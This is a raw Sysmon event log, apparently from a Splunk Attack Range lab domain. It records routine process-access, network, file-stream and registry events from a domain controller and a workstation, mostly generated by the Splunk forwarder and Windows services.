07:53:53.867{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.867{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.853{466BC892-F511-60EB-4B7D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
354300x80000000000000001049408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.888{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51048-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.888{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51048-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001049406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.614{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C0456AF753947837EC77AFA0ED46791,SHA256=E91A1A3EFFA517EC8705B78A0C98641207B017C4897030F989DB0310FD0A1FE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.878{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51047-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001049404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.878{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51047-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 
354300x80000000000000001049403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.857{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51046-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001049402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.856{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51046-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001049401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.414{466BC892-F511-60EB-4A7D-00000000CF01}94926996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.793{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51045-false10.0.1.12-8000- 10341000x80000000000000001049399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:53.236{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:53.236{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.236{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.233{466BC892-F511-60EB-4A7D-00000000CF01}9492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EB2868A4071B7F96385DD7BCA8833E,SHA256=9A7C20F895E195AB5F8EB0401EF3BD871B1B7BDE20767BCABF4508A58974CA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:53:54.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=582BF4B4240E02C088612DAF9C1E8055,SHA256=2E9EAEAA46BCDBF9EE93A22CEAAC816B76013127F2EA4B925B9C98F97243CA9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:54.867{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B29FF3EB5E8EBFCF9B9FA2436F1A551,SHA256=691495A1765D6D61F9819061DE3A05398B7830BA07C92FA132264CC9D06730DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:54.099{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E13DB7C632294D20F6AF4E73C0EEE5,SHA256=C7074C19EE233AEE810FB35C6164FCD300DB1FFDAB46291BE348B6B110AEE540,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:52.300{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57285-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:55.672{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A2381797403F8CA492F75A9032B4C94,SHA256=B946CA5839CCD692A3C73C664BE29BE9F603BADC8F3D1E86416673ECF27BCF39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:55.114{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE07CC8ADB8823401C524CE0957B28D5,SHA256=15C7C3B30FF365B6A0387B2AF9862AEC393E5C5A68439947BFC3035C9D43DF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:56.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA67BFE7B7D25902671D23902DA222A,SHA256=E1888675AF26B3134C08841AC94984F594AF8D558F95ED10BCB14F6A4391518C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:56.133{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6627CEED8F47D5C8E71743F83855AA6,SHA256=D0B19BBBFBA2BDD7A29F91AA8C2F3068DE75D34B007B0BE08C88D28424EEA891,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:57.734{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F88914C22411F1026685341DB6D750BA,SHA256=EBF1FA88FE2F913082DE8EF7DC20791D4677ED9F74CF6FF820E1B7BF1342200E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:49.817{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net30620-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:57.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F26EF4993AFF2959421FE26E6DCE4347,SHA256=FFB8DAE6F46AB49E9799BE262E332B8528838D76662E75E42D2A83B4979CA314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:57.014{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:58.766{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E1DCD6ECB0C72337253FE0A5A0F86A9,SHA256=B22AAAD1E7BDF5D7DCC51E6738DFEEDA53297871354D1A9685BED6932E192079,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:57.304{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57286-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.540{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51049-false10.0.1.12-8089- 23542300x80000000000000001049425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:58.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=122DAF525B5FF128E70F7B50A65F2824,SHA256=1CAFE86FCA7B2F91320951EBC7DF4737398AEA93C87E66E9A7D4651658C595B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:58.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B076BCCCE6E146C06E97813F4895455,SHA256=C16581144110C89F5B8BC98060C7334D4783D2B0A1D65BBFD5F7137D490F19BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:59.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=600818A7DDC719B624146DB395DE4778,SHA256=4A850BF67F83A08995B1785B3103A5AF7803388A81DBD93BEFD7880B5BB70789,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6ae1db) 13241300x80000000000000001049435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xb09424fc) 13241300x80000000000000001049434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x12588cfc) 13241300x80000000000000001049433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x741cf4fc) 13241300x80000000000000001049432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6ae1db) 13241300x80000000000000001049430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xb09424fc) 13241300x80000000000000001049429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 